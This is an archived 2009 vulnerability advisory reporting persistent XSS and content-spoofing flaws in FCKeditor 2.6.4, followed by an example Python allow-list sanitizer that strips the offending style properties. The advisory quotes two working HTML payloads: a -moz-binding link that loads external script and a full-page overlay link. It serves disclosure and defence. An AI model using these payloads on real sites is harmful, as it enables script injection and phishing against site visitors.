securityvulns: SECURITYVULNS:DOC:22491
Sep 22, 2009 - 12:00 a.m.

XSS and Content Spoofing vulnerabilities in FCKeditor

vulners.com

Hello 3APA3A!

I want to warn you about Cross-Site Scripting and Content Spoofing vulnerabilities in FCKeditor.

XSS:

This is a persistent XSS vulnerability. The attack is conducted by placing a link that sets the style.

<a href="http://test" style="-moz-binding:url('http://site/xss.xml#xss')">test</a>

This vulnerability works in Mozilla and Firefox (before Firefox 3.0).

Content Spoofing:

This is a persistent Content Spoofing vulnerability.

<a href="http://websecurity.com.ua" style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px">&nbsp;</a>

These vulnerabilities are in the editor itself, so they can be used at any site which uses FCKeditor as the editor of its web forms.

FCKeditor 2.6.4 (and 2.6.4.1 must be too) and previous versions are vulnerable.

I mentioned these vulnerabilities at my site (http://websecurity.com.ua/3300/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
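Both issues in the post come from the editor passing a user-supplied `style` attribute through unchanged: one carries a `-moz-binding` property, the other uses absolute positioning to lay a full-page link over the site. The usual server-side defence is an allow-list sanitizer that keeps only known-safe tags, attributes and CSS properties. The following is an added example written for this page; it is not FCKeditor code and not the fix the project shipped, and the allow-lists (tags, attributes, CSS properties, URL schemes) are assumptions chosen for the demonstration. It is run here against the two payloads quoted in the post plus a constructed benign sample.

```python
"""Allow-list sanitizer for rich-text HTML submitted through a WYSIWYG editor.

Added example: not FCKeditor code and not the project's patch. The tag,
attribute, CSS-property and URL-scheme allow-lists are assumptions.
"""
import re
from html import escape
from html.parser import HTMLParser
from typing import Optional

ALLOWED_TAGS = {"a", "b", "i", "u", "em", "strong", "p", "br", "ul", "ol", "li"}
VOID_TAGS = {"br"}
ALLOWED_ATTRS = {"a": {"href", "title", "style"}, "p": {"style"}, "li": {"style"}}
# Only cosmetic CSS survives: binding, sizing and positioning properties are dropped,
# which removes both the -moz-binding vector and the full-page overlay spoof.
ALLOWED_CSS_PROPS = {"color", "font-weight", "font-style", "text-decoration", "text-align"}
ALLOWED_SCHEMES = ("http://", "https://", "mailto:")
# Values that reach outside the declaration (url(), expression(), escapes, quotes) are rejected
CSS_VALUE_DENY = re.compile(r"""url\s*\(|expression\s*\(|javascript:|[\\@;<>"']""", re.I)
CSS_VALUE_ALLOW = re.compile(r"^[a-z0-9#%., -]+$", re.I)


def sanitize_style(style: str) -> str:
    """Keep only allow-listed property:value pairs whose values are plain tokens."""
    kept = []
    for decl in style.split(";"):
        if ":" not in decl:
            continue
        prop, value = decl.split(":", 1)
        prop, value = prop.strip().lower(), value.strip()
        if prop not in ALLOWED_CSS_PROPS:
            continue
        if CSS_VALUE_DENY.search(value) or not CSS_VALUE_ALLOW.match(value):
            continue
        kept.append(f"{prop}:{value}")
    return ";".join(kept)


def sanitize_href(href: str) -> Optional[str]:
    """Allow only absolute http/https/mailto links; anything else is dropped."""
    value = "".join(href.split())  # remove embedded whitespace before the scheme check
    return value if value.lower().startswith(ALLOWED_SCHEMES) else None


class RichTextSanitizer(HTMLParser):
    """Re-emits only allow-listed markup; everything else is discarded, text is re-escaped."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list = []
        self.open_tags: list = []   # allowed tags emitted and still open
        self.skip_depth = 0         # >0 while inside <script>/<style>; their text is dropped

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS or self.skip_depth:
            return
        parts = [tag]
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "style":
                value = sanitize_style(value)
            elif name == "href":
                value = sanitize_href(value)
            if value:
                parts.append(f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if tag in self.open_tags:
            while self.open_tags:            # also closes tags left open inside it
                closed = self.open_tags.pop()
                self.out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data, quote=False))

    def close(self):
        super().close()
        while self.open_tags:                # close whatever the submission left open
            self.out.append(f"</{self.open_tags.pop()}>")


def sanitize_rich_text(html: str) -> str:
    parser = RichTextSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed samples: the two payloads quoted in the post plus a benign one
XSS_PAYLOAD = """<a href="http://test" style="-moz-binding:url('http://site/xss.xml#xss')">test</a>"""
SPOOF_PAYLOAD = ('<a href="http://websecurity.com.ua" style="width:100%;height:100%;'
                 'display:block;position:absolute;top:0px;left:0px">&nbsp;</a>')
BENIGN = '<p style="color:#ff0000;font-weight:bold">Hi <a href="javascript:alert(1)">x</a></p>'

if __name__ == "__main__":
    for sample in (XSS_PAYLOAD, SPOOF_PAYLOAD, BENIGN):
        print(sanitize_rich_text(sample))
```

The design point is that the sanitizer never tries to recognise bad CSS; it recognises good CSS and drops the rest, so a vendor-specific property it has never heard of (such as `-moz-binding`) is removed by default rather than slipping through a deny-list. Positioning and sizing properties are likewise absent from the allow-list, which is what defeats the overlay used for content spoofing.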